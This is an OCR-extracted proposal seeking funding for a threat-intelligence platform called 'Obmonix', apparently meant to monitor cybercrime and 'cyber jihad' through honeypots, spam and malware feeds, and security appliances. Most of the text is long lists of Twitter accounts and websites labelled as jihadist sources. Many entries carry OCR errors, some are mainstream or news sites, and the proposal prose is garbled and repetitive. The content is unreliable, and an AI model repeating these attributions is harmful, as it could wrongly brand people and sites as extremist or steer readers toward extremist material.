https://twitter.com/gkgjfufjc 

https://twitter.com/humaninnocence 

https://twitter.com/monaserl56 
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• https://twitter.com/muriidil2 

• https://twitter.com/poompaiii 




• https://twitter.com/muslim_13_ 

• https://twitter.com/ahmadkhloofll5 

• https://twitter.com/Masl24an 

• https://twitter.com/ahmedmahmoudil2 

• https://twitter.com/dfghujuiytrr 

• https://twitter.com/mejedklm 

• https://twitter.com/f73071755 

• https://twitter.com/rkrk4m26 

• https://twitter.com/dyalla72 

• https://twitter.com/sa7awetbuslim04 

• https://twitter.com/TP57iQ3ICAGgKzV 

• https://twitter.com/mohammedsz6 

• https://twitter.com/1993Agmadl993 

• https://twitter.com/Bbsswwnn 

• https://twitter.com/almnasron4 

• https://twitter.com/bar_bell 

• https://twitter.com/ManguAilon55 

• https://twitter.com/modie_50 

• https://twitter.com/Njd_qt78is 

• https://twitter.com/Gehaaadll22 




• https://twitter.com/bladi _00alaslam 

• https://twitter.com/fallujhal 

• https://twitter.com/AboFareed 10 

• https://twitter.com/manerland 

• https://twitter.com/abo _a _94 

• https://twitter.com/3Abouwalid 

• https://twitter.com/bakreebeeko _5 

• https://twitter.com/3lill87 

• https://twitter.com/Alnablsy97 
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• https://twitter.com/G6A77 

• https://twitter.com/The0bserver91 

• https://twitter.com/6cccg2 

• https://twitter.com/ISIS _HER01 

• https://twitter.com/ZZzBXqHOymuBANK 

• https://twitter.com/teamsystemdz 

• https://twitter.com/vbhgxdfc 

• https://twitter.com/bhCotn 

• https://twitter.com/maktaba _1 

• https://twitter.com/osama daml 




• https://twitter.com/fata _almosel 

• https://twitter.com/xxmm4455777 

• https://twitter.com/abujalaall 

• https://twitter.com/Waseemalsaudi 

• https://twitter.com/Khlifa27al2 

• https://twitter.com/AbidaGina 

• https://twitter.com/Ansar _DawlalO 

• https://twitter.com/yesteyesic4 

• https://twitter.com/lieffejongen 

• https://twitter.com/MohammedAtta22 

• https://twitter.com/Ticaal90 

• https://twitter.com/ANAdenalSomali 

• https://twitter.com/ns45678 

• https://twitter.com/AbouShahadeh 

• https://twitter.com/jihadil0744139 

• https://twitter.com/abohamzaalturki 

• https://twitter.com/JoniManm 

• https://twitter.com/omarl985741 

• https://twitter.com/see00012 

• https://twitter.com/almuhajerBackup 




• https://twitter.com/sadking23 
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• https://twitter.com/qwttplly 

• https://twitter.com/k42isisa 

• https://twitter.com/dhxhsvd2 

• https://twitter.com/77nb_ 

• https://twitter.com/dawlajokers 

• https://twitter.com/monaser0017 

• https://twitter.com/dawlawialg671 

• https://twitter.com/fahadeyad62 

• https://twitter.com/btr333btr4 

• https://twitter.com/vrjevvel 

• https://twitter.com/Hhdhdgl 

• https://twitter.com/GF98LKI 

• https://twitter.com/dola24687 

• https://twitter.com/Talal _Q30 

• https://twitter.com/muslimmouwahed8 

• https://twitter.com/8itismesalman 

• https://twitter.com/kubuiman03v 

• https://twitter.com/jihadiuser58 




• https://twitter.com/PARRIS_951 

• https://twitter.com/isis_1144 

• https://twitter.com/SyariahlSlight8 

• https://twitter.com/meek_don 

• https://twitter.com/yotorg 

• https://twitter.com/facebookaccoun2 

• https://twitter.com/nseem066 

• https://twitter.com/AnsarAd98 

• https://twitter.com/ieshabaqea 

• https://twitter.com/batist550 

• https://twitter.com/aassddffa833 

• https://twitter.com/madridi4good 

• https://twitter.com/nor92331 
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• https://twitter.com/lEINusral 

• https://twitter.eom/j Jj Jjj _5577 

• https://twitter.com/strange566 

• https://twitter.com/gp2126 

• https://twitter.com/pp62068813 

• https://twitter.com/_N _ 





• https://twitter.com/Uddjdnl 

• https://twitter.com/kathebwll 

• https://twitter.com/bbgg75157900 

• https://twitter.com/Ramal5202 

• https://twitter.com/ J _l _T_E _M _ 

• https://twitter.com/mohamed _zainab4 

• https://twitter.com/ChicbnmAbn 

• https://twitter.com/Tr8 _K0 

• https://twitter.com/eng__sr 

• https://twitter.com/gjjkjtogfffdr 

• https://twitter.com/Om_khatabb 

• https://twitter.com/ubj _k 

• https://twitter.com/KhilafahDawah5 

• https://twitter.com/AbuDharlslandi7 

• https://twitter.com/ixcncnl 

• https://twitter.com/anaeldora30 

• https://twitter.com/mazenhapne 

• https://twitter.com/qwtpllry 

• https://twitter.com/Dabiiq7 

• https://twitter.com/A05462492 





• https://twitter.com/Hmode5556Www 

• https://twitter.com/3MlagD01 

• https://twitter.com/meditato 

• https://twitter.com/ukhtiaishal 

• https://twitter.com/abcdl23456789a7 
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• https://twitter.com/abou _amina37 

• https://twitter.com/AmonMame 

• https://twitter.com/O 08 OOO 08 OOl 

• https://twitter.com/Abu Bin _Fartin 

• https://twitter.com/marsds98zahrany 

• https://twitter.com/_ihsen _086 _ 

• https://twitter.com/33Khilafa 

• https://twitter.com/gajhfjfd 

• https://twitter.com/0bayd6Wevrw 

• https://twitter.com/ 0 o 00 ooq 

• https://twitter.com/e30isisa 

• https://twitter.com/41invasion 

• https://twitter.com/OplS75 

• https://twitter.com/K_H_034 




https://twitter.com/h90 _6 

https://twitter.com/know _paris 

https://twitter.com/saeul7 

https://twitter.com/anjemchoudary 

https://twitter.com/tnt502tnt502 

https://twitter.com/AbuFullaan9th 

https://twitter.com/gmailco69426226 

https://twitter.com/Owais _51 

https://twitter.com/mohamed20607 

https://twitter.com/med _syr _ira91 

https://twitter.com/muslim Jibi 

https://twitter.com/muahied 1 

https://twitter.com/qqeqq00111 

https://twitter.com/ahmedl4377 

https://twitter.com/aabuyosif 

https://twitter.com/vi p444662 

https://twitter.com/saeul7 
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• https://twitter.com/dgsdg00712420 

• https://twitter.com/kabugezo 




• https://twitter.com/AbulslamlS1990 

• https://twitter.com/mafel 65 

• https://twitter.com/AbuHafsaBritani 

• https://twitter.com/Ahmadkhalf2012 

• https://twitter.com/YourOwnBroll6 

• https://twitter.com/ReportersOOO 

• https://twitter.com/TurMedia318/ 

• https://twitter.com/GermanyllnderAtk 

• https://twitter.com/Wakellp_MV 

• https://twitter.com/saeul7 

• https://twitter.com/Bushrall _IS 

• https://twitter.com/TurMedia318 

• https://twitter.com/jabalybaraa 

• https://twitter.com/s_2017_ 

• https://twitter.com/frm450 

• https://twitter.com/gogoaag82 

• https://twitter.com/xxx__800 

• https://twitter.com/pe0jnv39mvnf 

• https://twitter.com/lslamArmy01 

• https://twitter.com/g8670062 _8 




• https://twitter.com/yyf_hallo 

• https://twitter.com/elAFX9kbARBByHv 

• https://twitter.com/lba559721 

• https://twitter.com/del _elremahl 

• https://twitter.com/isisom61 

• https://twitter.com/ldififkkl 

• https://twitter.com/makdicil970 

• https://twitter.com/mahsudll7 

• https://twitter.eom/K A _S _E _R _5 
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• https://twitter.com/lmaqdese 

• https://twitter.com/nour_umm 

• https://twitter.com/5aq5qDGpNsr4IDU 

• https://twitter.com/AbdMouwahid 

• https://twitter.com/gaza9310 

• https://twitter.com/Jfdlbk 

• https://twitter.com/Elkhelafa _Now 

• https://twitter.com/jazaerl2254477 

• https://twitter.com/lssamSayari 

• https://twitter.com/Abo_mhdi29 





• https://twitter.com/moedker01 

• https://twitter.com/hafeedl001 

• https://twitter.com/Yamani _5 

• https://twitter.com/alsumoudl7 

• https://twitter.com/nbnlOOO 

• https://twitter.com/khilafahinfos 

• https://twitter.com/teagouchl 

• https://twitter.com/aaallaaallaaa 

• https://twitter.com/ondayiwillkilly 

• https://twitter.com/DjibrilParisi 

• https://twitter.com/aawwss_22 

• https://twitter.com/Dolawiyah Jo6 

• https://twitter.com/gfd6064 

• https://twitter.com/ansaarl32 

• https://twitter.com/drwaleed5253 

• https://twitter.com/ajnad55 

• https://twitter.com/inbes3 

• https://twitter.com/asaudicowdonkey 

• https://twitter.com/zxzx321zxzx 

• https://twitter.com/UmmAbdallah89 




• https://twitter.com/arabhty 
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• https://twitter.com/Asirat _hraminl9 

• https://twitter.com/EhliSunneti3 

• https://twitter.com/salilbnim 

• https://twitter.com/Saifjazraawi 

• https://twitter.com/ablo3zaml2 

• https://twitter.com/frost0023 

• https://twitter.com/uiopup 

• https://twitter.com/Kassar_lam 

• https://twitter.com/gmccccclO 

• https://twitter.com/drherhdfbdrhdhs 

• https://twitter.com/kinght78ag 

• https://twitter.com/JUI_LJ 

• https://twitter.com/snipern433 

• https://twitter.com/Ffhfbfbl 

• https://twitter.com/Almohajer_103 

• https://twitter.com/oummoudjahid 

• https://twitter.com/ahmadsaid91 

Detailed Project Funding Stages Information 




The initial stage of the project will consist of selective and 
timely purchase of all the necessary appliances in¬ 
cluding the timely localization and successful acquisition of 
fake Web sites honeypot solutions including the active 

acquisition of network assets for the purpose of successfully 
honeypot solution placement. 

• The main objective of the initial phase would be to acquire 
all the necessary equipment for the purpose of 

setting up the foundations for the Obmonix platform. The 
equipment will be acquired in a timely fashion largely 

relying on a selected set of proprietary industry leading set 
of contacts. 

• The main objective of the next phrase would be to ensure 
that the equipment is placed in a secure location 

and is properly maintained for the purpose of ensuring that 
the operator is capable of operating the Obmonix 

platform in a secure way. 

• The main objective of the next phase would be to 
establish the foundations of the world's largest data set of 
in¬ 
telligence data for the purpose of ensuring that the 
Obmonix platform is capable of processing and intercepting 

the necessary data. 

• The main objective of the next phase would be to acquire 
the necessary proprietary service based solutions 



that would empower the operator with the necessary tools 
to process and intercept data. 
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• The main objective of the next phase would be to process 
and intercept the world's largest data set of cybercrime and 
cyber jihad data. 

Sample Cyber Jihad Forums: 

• http://rion2005.100free.com 

• http://2s2s.com 

• http://abo-ali.com 

• http://Aboalqaqa.blogspot.com 

• http://aboaumir.modawanati.com 

• http://abomoath.ahlablog.com 

• http://abomosab-s.110mb.com 

• http://abu-hadi.net 

• http://abu-qatada.com 

• http://abubaraa.co.uk 

• http://abujibriel.com 

• http://aekhlaas.com 

• http://aekhlaas.net 

• http://ahlu-tawheed.com 




• http://al3aren.com/vb/index.php 

• http://al3wda.com/vb/index.php 

• http://al-amanh.net 

• http://al-ansar.net 

• http://al-boraq.info 

• http://al-boraq.org 

• http://al-busyrol.info 

• http://al-busyro.info 

• http://al-ekhlaas.net 

• http://al-ekhlaas.net/forum 

• http://al-ekhlaas.org 

• http://al-faloja.com 

• http://al-faloja.info/vb/index.php 
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• http://al-farooq.net 

• http://al-jahafal.com/vb 

• http://al-kafkaz.com 

• http://al-mustaqbal.net 

• http://al-nour.net 

• http://al-ommh.net 



http://al-qimmah.net 

http://al-rashedeen.info 

http://al-tamkeen.com 

http://al-yemen.org 

http://alahed.org 

http://alamer.biz/ameer/home.html 

http://alanbar.topgoo.net 

http://alanssar.net 

http://alaseb.com 

http://albasrah.net/index.php 

http://albawaba.com 

http://albayan.co.uk 

http://albayanislamac.com 

http://albetaqa.com 

http://alboraq.info 

http ://AI boraq. i nfo/foru m 

http://alboraqforum.info 

http://albtar.ltalk.net/index.htm 

http://albusyro.info 

http://albuxoriy.com 



• http://alekhlaas.com 

• http://alekhlaas.info 

• http://alekhlaas.net 

• http://alekhlaas.org 

• http://alemaral.org 
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• http://alemarah.org 

• http://alfajrtaqni.net 

• http://alfetn.com 

• http://alfetn.com 

• http://alfida.jeeran.com 

• http://alfidaa.biz 

• http://alfidaa.info/vb 

• http://alfidaa.org/vb 

• http://alforqan.ingoo.us 

• http://Alforqan.ingoo.us 

• http://alfurq4n.org 

• http://algyshalmnsur.r8.org 

• http://AIHanein.com 

• http://AIHesbah.net 




http://AIHesbah.org 

http://alifati.wordpress.com 

http://alintiqad.com 

http://aljazeeratalk.net/forum/ 

http://aljazeeratalk.net/portal 

http://alkhelafa.eu 

http://allah4ever.hi5.com 

http://almaqdese.net 

http://almaqreze.net 

http://almaqreze.net/ar 

http://almedad.com/vb 

http://almnbr.net/vb 

http://almob2.com 

http://almobshrat.net 

http://almokhtsar.com 

http://almqdes.net 

http://almubarakradio.com 
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• http://Alnakshabandia-army.com 

• http://alnakshabandia-army.org/home 




http://Alneda.com 

http://Alnour.hyperphp.com 

http://alnour.hyperphp.com/vb 

http://Alnusra.net 

http://alnusrra.net 

http://alokab.com 

http://alokab.com/forums/lofiversion 

http://alqassam.ps 

http://alqoqaz.net 

http://alquds.co.uk 

http://alrafdean.org 

http://alraiah.net 

http://Alsaha.com 

http://alshahid.org 

http://alsomod-iea.info 

http://alsomod.com 

http://alsunnah.info 

http ://AI su n na h. i nfo 

http://altabetoun.110mb.com 

http://altarefe.com 



• http://altarefe.com is 

• http://altawbah.net/vb 

• http://altaybeh.net 

• http://alweya.com 

• http://an-najah.net 

• http://anashid.ru 

• http://Anbaar.net 

• http://anjemchoudary.co.uk 

• http://ansal.info 
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• http://ansaaar.com 

• http://ansarl.info 

• http://ansarll.org 

• http://ansar-alhaqq.net 

• http://ansar-jihad.net 

• http://ansar.tv 

• http://Ansarnet.ws 

• http://ansharulislam.com 

• http://anti-majos.com 

• http://antiliberalnews.com 




• http://antydetroidmichigan.blog.onet.pl 

• http://aqeeda2008.maktoobblog.com 

• http://aqlislamiccenter.com 

• http://arrahmah.com 

• http://asadl01.jeeran.com 

• http://asaeb.net 

• http://asaebweb.com 

• http://asd813.maktoobblog.com 

• http://atahadii.com/vb 

• http://Azzam.com 

• http://azzammedia.com 

• http://azzammedia.net 

• http://bab-ul-islam.net 

• http://baghdadsniper.net 

• http://bintjbeil.com 

• http://bumisyam.com 

• http://cageprisoners.com 

• http://cageuk.org 

• http://chechensinsyria.com 

• http://ClearGuidance.com 




• http://clearinghous.infovlad.net 
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• http://cyberkov.com 

• http://czeczenia.blog.onet.pl 

• http://d-sunnah.net 

• http://dakwahmedia.net 

• http://darelhadi.com 

• http://Darelhadi.com 

• http://daruhilafe.com 

• http://darultavhid.com 

• http://daulahislamiyah.net 

• http://daulahislamiyyah.com 

• http://dawaalhaq.com 

• http://dawatehaq.net 

• http://dawla-is.cf 

• http://dd-sunnah.net/forum/index.php 

• http://dhiqar.net 

• http://dinhaqq.info 

• http://doguturkistanbulteni.com 

• http://dr-algzouli.com 




• http://dr-mahmoud.com 

• http://drbj.net 

• http://duniaterkini.com 

• http://dwl-is.appspot.com 

• http://dyoul991.maktoobblog.com 

• http://e-kl-s.info 

• http://e-kl-s.net 

• http://egysite.com/al2nsar 

• http://ek-ls.org 

• http://ekhlaas.biz 

• http://ekhlaas.cc 

• http://Ekhlaas.cc 

• http://ekhlaas.com 
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• http://ekhlaas.info 

• http://ekhlaas.net 

• http://ekhlaas.org 

• http://ekhlaas.ws 

• http://el-tewhid.com 

• http://eldorar.com 




• http://elmanara.org 

• http://Elshouraa.ws/vb 

• http://eltwhed.110mb.com 

• http://eltwhed.110mb.com/homepage.htm 

• http://enfalmedya.com 

• http://eramuslim.com 

• http://eraqeidawlh.maktoobblog.com 

• http://f2008h.maktoobblog.com 

• http://falestiny.net 

• http://falloja.blogspot.com 

• http://farouqomar.net 

• http://fatehforums.com 

• http://fidaal.net/vb 

• http://fisyria.info 

• http://forum.hawaaworld.com 

• http://forum.saraya.ps 

• http://forums.ikhwan.net/t 

• http://forums.naseej.com 

• http://fpi.or.id 

• http://fursan-al-iraq.over-blog.com 




• http://g-elshmal.com/vb/index.php 

• http://generalvekalat.org 

• http://ghaaly.com 

• http://ghaliboun.net 

• http://gimfmedia.com/tech 
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• http://gulf-up.com 

• http://gurmad.info 

• http://h-alali.net 

• http://halabnews.com 

• http://halifat.info 

• http://halifat.org 

• http://hamas.ps 

• http://hamasaliraq.com 

• http://hamasiraq.org 

• http://hanein.info 

• http://hanein.info/ 

• http://hanein.info/vb 

• http://hanein.info/vb/forum.php 

• http://harb-net.com/vb 




http://harunyahya.com 

http://healthl.maktoobblog.com 

http://hewar.khayma.com 

http://heyetnet.org 

http://hidayatullah.com 

http://hizb-afghanistan.com 

http://hizb-america.org 

http://hizb-australia.org 

http://hizb-eastafrica.com 

http://hizb-pakistan.com 

http://hizb-russia.info 

http://hizb-turkiston.net 

http://hizb-turkiye.org 

http://hizb-ut-tahrir-almaghreb.info 

http://hizb-ut-tahrir.dk 

http://hizb-ut-tahrir.info 

http://hizb-ut-tahrir.org 
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• http://hizb-ut-tahrir.se 

• http://hizb-uzbekistan.info 




• http://hizb.org.ua 

• http://hizb.org.uk 

• http://Hizbollah.org 

• http://hizbollah.tv 

• http://Hizbollah.tv 

• http://hizbut-tahrir.or.id 

• http://hizbuttahrir.info 

• http://hizbuttahrir.org 

• http://ht-afghanistan.org 

• http://ht-bangladesh.info 

• http://ht-tunisie.info 

• http://htmedia.info 

• http://alboraqmedia.org 

• http://alekhlaas.cc 

• http://alweehdat.com/vb 

• http://Hussamaldin.jeeran.com 

• http://iaisite-eng.org 

• http://iaisite.biz 

• http://laisite.info 

• http://iaisite.info 




• http://iaisite.info/index.php 

• http://iaisite.net 

• http://iaisite.org 

• http://iczkeria.blog.onet.pl 

• http://ikhwan.net 

• http://imamtv.com 

• http://imamtv.com/ 

• http://infovlad.net/mirror _alansar _alsunnah 

• http://invitetoislam.com 
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• http://invitetoislam.org 

• http://iraq-war.ru 

• http://lraqiasaeb.org 

• http://iraqipa.net 

• http://iraqirabita.org.uk 

• http://iraqiyoon.com 

• http://lraqpatrol.com 

• http://iraqpatrol.com 

• http://iraqpatrol.com/php 

• http://isdarat-tube.com 




• http://isdarat.org 

• http://isdarat.tv 

• http://isecurlty.com 

• http://islahhaber.net 

• http://islam-iea.com 

• http://islamdaveti.com 

• http://islamdevleti.info 

• http://islamdevleti.org 

• http://islamdevleti.org/ 

• http://islamdin.com 

• http://islamdin.net 

• http://islamic-dw.com 

• http://islamic-f.net/vb 

• http://lslamic-f.net/vb 

• http://islamic-state.ga 

• http ://isla mi c-state. media 

• http://islamicawakening.com 

• http://islamicdigest.net 

• http://islamiciraq.maktoobblog.com 

• http://lslamiclraq.modawanati.com 




• http://islamiciraq.modawanati.com 
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• http ://islami estate, media 

• http://islamicstate.pro 

• http://islamicsupremecouncil.org 

• http://islammemo.ee 

• http://islampos.com 

• http://islamqa.info 

• http://islamway.com 

• http://isnews.net 

• http://j-aliraq.net 

• http://jaami.info 

• http://jaber-m-b.maktoobblog.com 

• http://jaber-mb.maktoobblog.com 

• http://jabhtnosra.appspot.com 




• http://jaishabibaker.net 

• http://JaishabiBaker.net 

• http://jamaatshariat.com/ru 

• http://jamahirl.ps 

• http://jamatdawa.com 

• http://jamatdawa.org 

• http://jannatoshiqlari.net 

• http://jehadway.7olm.org 

• http://jihadmin.com 

• http://jnoub.org 

• http://JondurRahmaan.com 

• http://jsc-web.net/vb 

• http://kabardeyonline.org/tr/index _tr.htm 

• http://kafilahmujahid.com 

• http://kafkaz.maktoobblog.com 

• http://Kataeb-20.org 

• http://kataeb-20.org/main 

• http://kataibaqssa.com/forum/index.php 
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• http://kataibaqssa.com/newarab 

• http://kavkaz.org.uk 

• http://kavkaz.tv 

• http://kavkazcenter.com 

• http://kavkazcenter.info 

• http://kavkazcenter.net 

• http://kavkazchat.com 

• http://kavkazjihad.com 

• http://khabarpana.com 

• http://khaleelstyle.com 

• http://khelafa.org 

• http://khilafa.org 

• http://khilafah-archives.com 

• http://khilafah.com 

• http://khilafah.net 

• http://khilafat.dk 

• http://kiblat.net 

• http://kirkuk.kalamfikalam.com 

• http://kokludegisim.net 

• http://ktb-20.com 




• http://Kwaflislam.com 

• http://kwaflislam.com/vb/index.php 

• http://ladn.maktoobblog.com 

• http://lakii.com 

• http://land-alsham.com 

• http://lasdipo.com 

• http://liputan-kita.com 

• http://m3ark.com 

• http://mail.ek-ls.org 

• http://Majahd.quickbb.net 

• http://majahd.quickbb.net/index.htm 
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• http://majahden.com 

• http://majelismujahidi.com 

• http://majles.alukah.net 

• http://maktoobblog.com 

• http://manbar.me 

• http://maqrezeradio.net 

• http://marsad.net 

• http://mediaislam.ucoz.ru 




• http://medicine2001.maktoobblog.com 

• http://mhesne.com 

• http://mitv.moy.su 

• http://mnbr.info 

• http://mobasher.110mb.com 

• http://moj-irq.com 

• http://montada.yaqen.net 

• http://moqavemat.com 

• http://moqawama.org 

• http://moqawama.tv 

• http://moqawmh.com 

• http://morasl.maktoobblog.com/ 

• http://mujahideenarmy.com 

• http://muntada.sawtalummah.com 

• http://muqawamah.com 

• http://muslimdaily.net 

• http://muslimprisoners.com 

• http://muslimuzbekistan.net 

• http://muslm.net 

• http://muslm.net/vb 




• http://muslm.org 

• http://muvahhid.info 

• http://muwahhid.info 
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• http://muwahideen.co.nr 

• http://myhesbah.net 

• http://mykhilafah.com 

• http://mymy.my-goo.net/index.htm 

• http://nahimunkar.com 

• http://nasrollah.org 

• http://Nasrunmiallah.net 

• http://nepras.ps 

• http://news.stcom.net 

• http://News.stcom.net 

• http://nkusa.org 

• http://nmayd.com 

• http://nmayd.com/ 

• http://nuruddin.4bb.ru 

• http://nusraah.com 

• http://old.kavkazcenter.com 




• http://omar-abdrahman.110mb.com 

• http://pal-is.net/vb 

• http://paldf.net 

• http://paldf.net/forum 

• http://palestine-info.com 

• http://palestinegallery.com 

• http://palestinianforum.net 

• http://palir.net 

• http://panjimas.com 

• http://pda.kavkaz.tv 

• http://profetensummah.com 

• http://qassam-rockets.skyrock.com 

• http://qassam-rockets.skyrock.com 

• http://qassam.ps 

• http://qudsnews.net 
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• http://qyemen.com 

• http://radioalfurqaan.com 

• http://radioalfurqaan.com is 

• http://radioandalus24.com 




• http://radyotevhid.com 

• http://ramaadi.ltalk.net/index.htm 

• http://rawadalmaly.com/vb 

• http://reformandjihadfront.org 

• http://revolution.muslimpad.com 

• http://rjfront.info 

• http://rjfront.org 

• http://Rmadi.top-me.com 

• http://saadarmy.com 

• http://saaid.net 

• http://sadcom.montadamoslim.com 

• http://salaf-us-saalih.com 

• http://Salafia.balder.prohosting.com 

• http://salafiah.com 

• http://salafimediauk.com 

• http://salam-online.com 

• http://samirkuntar.org 

• http://saraya.ps 

• http://Sarayaalquds.org 

• http://sarayaalquds.org 




• http://Sarayasaad.com 

• http://sarayasaad.com 

• http://save-islam.com 

• http://Sawtaljihad.org 

• http://sawtaljihad.org 

• http://sawtalummah.com 

• http://se-te.com 
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• http://shabakataljahad.com 

• http://shahamat-arabic.com 

• http://shahamat-english.com 

• http://shahamat-farsi.com 

• http://shahamat-movie.com 

• http://shahamat-urdu.com 

• http://shamikhl.info 

• http://shamilonline.org/rusnya/index _ru.htm 

• http://sharia4indonesia.com 

• http://Shiaweb.org 

• http://shiaweb.org/hizbulla/index.html 

• http://Shmo5allslam.net 




• http://shoutussalam.org 

• http://skaba.ps 

• http://Sobhank.com 

• http://sobhank.com/vb 

• http://somalimemo.net 

• http://somod.org 

• http://soutalhaq.net 

• http://Soutweb.100free.com 

• http://sqr-al3rb.com 

• http://suara-islam.com 

• http://sunnahcare.com 

• http://sunnahonline.com 

• http://suwaidan.com 

• http://swalif.net 

• http://syamina.com 

• http://syamorganizer.com 

• http://tahrir-syria.info 

• http://tajdeed.org.uk 

• http://takvahaber.net 
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• http://tarani.info 

• http://Tawhed.ws 

• http://tevhiddergisi.com 

• http://tevhiddersleri.com 

• http://tevhididavet.com 

• http://tevhidigundem.net 

• http://theshamnews.com 

• http://thethirdjihad.com 

• http://thoriquna.com 

• http://thoriquwna.com 

• http://toorabora.org 

• http://turkhackteam.org 

• http://twelvershia.net 

• http://uicforce.co.vu 

• http://ummah.com 

• http://ummahislam.com 

• http://ummetislam.info 

• http://ummetislam.net 

• http://vb999.maktoobblog.com 

• http://vb.fpnp.net 




• http://vb.roro44.com/index.php 

• http://vd.ag 

• http://vdagestan.com 

• http://voa-islam.com 

• http://W-N-N.net 

• http://Wa3ad.org 

• http://wa3iarabi.com 

• http://wa7at.org/vb 

• http://wap.kavkaz.tv 

• http://worldakhbar.com 

• http://worldnet.ws 
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• http://worldnet.ws/radio/index.html 

• http://worldnet.ws/vb 

• http://yenidenislam.com 

• http://zad-muslim.com 

• http://zaeerl.22web.net 

• http://zaidhamid.pk 

• http://zuheerl7.maktoobblog.com 
Detailed Project Funding Phase Information 




01. The initial stage of the project will consist of selective 
and timely purchase of all the necessary appliances 

including the timely localization and successful acquisition 
of fake Web sites honeypot solutions including the active 

acquisition of network assets for the purpose of successfully 
honeypot solution placement. 

• Associated deliverables will include access to proprietary 
technology the ability to associate long-term task 

including the ability to set the foundation for the Obmonix 
platform including eventual commercialization of the 

Obmonix platform further enhancing the operator's ability 
to continue providing the Intelligence Community 

with the necessary data to proactively respond to a growing 
set of malicious nation-state and malicious actors 

type of cybercrime and cyber-jihad activity globally. 

02. The next stage will consist of active placement of the 
required equipment in a secure location including the 

placement of active secure measures in place to ensure that 
the Obmonix operator remains work in a secure location 

including premise. 

• Associated deliverables will include secure work place 
including the ability to empower the operator with the 

necessary data to perform various operator activity ensuring 
global presence for Intelligence Community mem¬ 


bers and the security industry 



03. The next stage will consist of active spam phishing and 
malware feed access purchase including successfully 

geolocated placement within specific regions of choice of 
interest inducing but not limited to Algeria, Argentina, 

Bahrain, Bolivia, Brazil, Burkina Faso, Chile, China, 
Colombia, Cyprus, Ecuador, Guatemala, Jordan, Democratic 

People's Republic of Korea, Liberia, Macao, Maldives, 
Moldova, Republic of Nauru, Niger, Pakistan, Poland, 
Romania, 

Sierra Leone, Sudan, Arab Republic Syrian, Togo, Uganda, 
Vanuatu, Yemen. 

• Associated deliverables will include access to the world's 
largest portfolio of threat intelligence data set including 

access to real-time data successfully empowering the 
operator with the necessary data to perform an operator 

activity. 
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04. The next stage will include the active acquisition of 
service-based type of localization and acquisition solutions 

leading to a successful set of data to be processed and 
collected by the sensor. 

• Associated deliverables will include access to proprietary 
technology successfully empowering the operator 


with the necessary data to perform the operator activity 
including real-time monitoring of the world's largest 

and most comprehensive sensor network based type of 
cybercrime and cyber-jihad sensor based type of plat¬ 
form. 

05. The next phase will include the active data acquisition 
from the Intelligence Community's leading intelligence 

gathering platform in the form of active data placement 
including the establishment of an active threat intelligence¬ 
gathering portal based type of platform. 

• Associated deliverable will include the world's largest data 
set of cybercrime and cyber jihad activity sensor type 

of platform eventually leading the Obmonix platform to 
reach a commercialization stage further enhancing the 

Intelligence Community's and the security industry's 
mission. 

Detailed Project Cost Proposal Information 

The initial stage of the project will consist of selective and 
timely purchase of all the necessary appliances in¬ 
cluding the timely localization and successful acquisition of 
fake Web sites honeypot solutions including the active 

acquisition of network assets for the purpose of successfully 
honeypot solution placement. 


FortiMail 



Key points: 


• The appliance is capable of processing millions of emails 
on a daily basis 

• The appliance is capable of maintaining a list of thousands 
of fake emails allowing additional attribution poten¬ 
tially expanding the capabilities of the appliance to include 
additional custom made spam origin sources. 

• The appliance is capable of delivering actionable 
intelligence on millions of spam origin sources, for Iran, Pak¬ 
istan, Saudi Arabia, Iraq and Syria, on a daily basis 

• The appliance is capable of delivering detailed 
information, leading, to the production of actionable 
intelligence, 

for Iran, Pakistan, Saudi Arabia, Iraq and Syria, on a daily 
basis. 
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The FortiMail appliance would ensure the active acquisition 
of spam for the purpose of establishing the foundations 

for a successful research and monitoring type of research 
and analysis type of system allowing the systematic 

real-time and automated acquisition of malicious software 
phishing and social engineering. 

• Blue Coat Malware Analysis 


Key points: 


• The appliance is capable of processing thousands of 
malware samples, on a daily basis 

• The appliance is capable of maintaining detailed 
information processed and delivered in an automated 
fashion 

for malicious sources originating in Iran, Pakistan, Saudi 
Arabia, Iraq and Syria 

• The appliance is capable of interacting with Web links 
found in malicious spam emails for the purpose of es¬ 
tablishing the foundations, for successful monitoring of 
malicious software phishing and social engineering 

originating for Iran, Pakistan, Saudi Arabia, Iraq, and Syria 
including the automated processing and interaction 

with mobile malware 

• The appliance is capable of maintaining detailed 
information leading to the production of quality real-time, 

actionable intelligence type of reports for malicious software 
phishing and social engineering data type of origin 

sources for Iran, Pakistan, Saudi Arabia, Iraq and Syria 

The Blue Coat Malware Analysis would ensure the 
automated and real-time acquisition of malicious software 

phishing and social engineering type of research and 
analysis type of research for the purpose of ensuring the 
active 



and real-time acquisition of malicious software phishing and 
social engineering research type of activity originating 

in these sources. 

• Vormetric encryption appliance 
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Key points: 

• The encryption appliance would ensure the real-time data 
storage of the research and analysis type of research 

and analysis type of data to ensure the availability 
confidentiality and integrity of the data for the purpose of 

producing actionable real-time intelligence based type of 
research and analysis reports type of research and 

analysis data. 

• The encryption appliance would ensure the active real¬ 
time storage of the actionable and real-time delivered 

type of research and analysis type of data allowing the 
efficient and systematic and automated research and 

analysis type of research report data to be processed and 
analyzed. 

The encryption appliance would ensure that the platform 
operator is properly empowered with the necessary data 

techniques and technologies to properly act upon analyze 
and respond to cybercrime and cyber jihad events globally. 


• Barracuda Web Application appliance 

Key points: 

• The Web application appliance would allow the automated 
secure use of the robot system allowing the system¬ 
atic real-time data acquisition on various jihadst sources 

• The Web application appliance would ensure the 
automated and efficient use of the robot in a secure fashion 

allowing the production of real-time actionable intelligence 
allowing the production of research and analysis 

based type of research and analysis type of, data. 

The Web application appliance would ensure that the 
operator is properly empowered with the necessary data 

techniques and technologies to properly act upon analyze 
and respond to cybercrime and cyber jihad events globally. 

• Checkpoint DDoS Protector 
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Key points: 

• The appliance is capable of preventing exposure of the 
network assets utilized by the network resulting poten¬ 
tially resulting in the exposure of the availability 
confidentiality and integrity of the information 


• The appliance is capable of ensuring the real-time 
automated and persistent availability and integrity and con¬ 
fidentiality of the information 

The Checkpoint DDoS Protector would ensure the constant 
availability of the network infrastructure utilized in this 

project potentially preventing compromise of the network 
assets resulting in improved productivity and realization 

of various project objectives. 

• Encryption appliance 

Key points: 

• The encryption appliance is capable of ensuring the 
confidentiality integrity and availability of the information 

• The encryption appliance is capable of distinguishing 
between multiple networks further ensuring a closed 

network type of network access 

The encryption appliance would ensure that the maximum 
possible secure measures are currently in place further 

ensuring that access to the closed restricted network 
remains as private as possible ensuring the confidentiality 

integrity and availability of the information to further ensure 
the active real-time intelligence based real-time type of 

research and analysis type of research and analysis type of 
data. 

• Cisco Catalyst 
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Key points: 
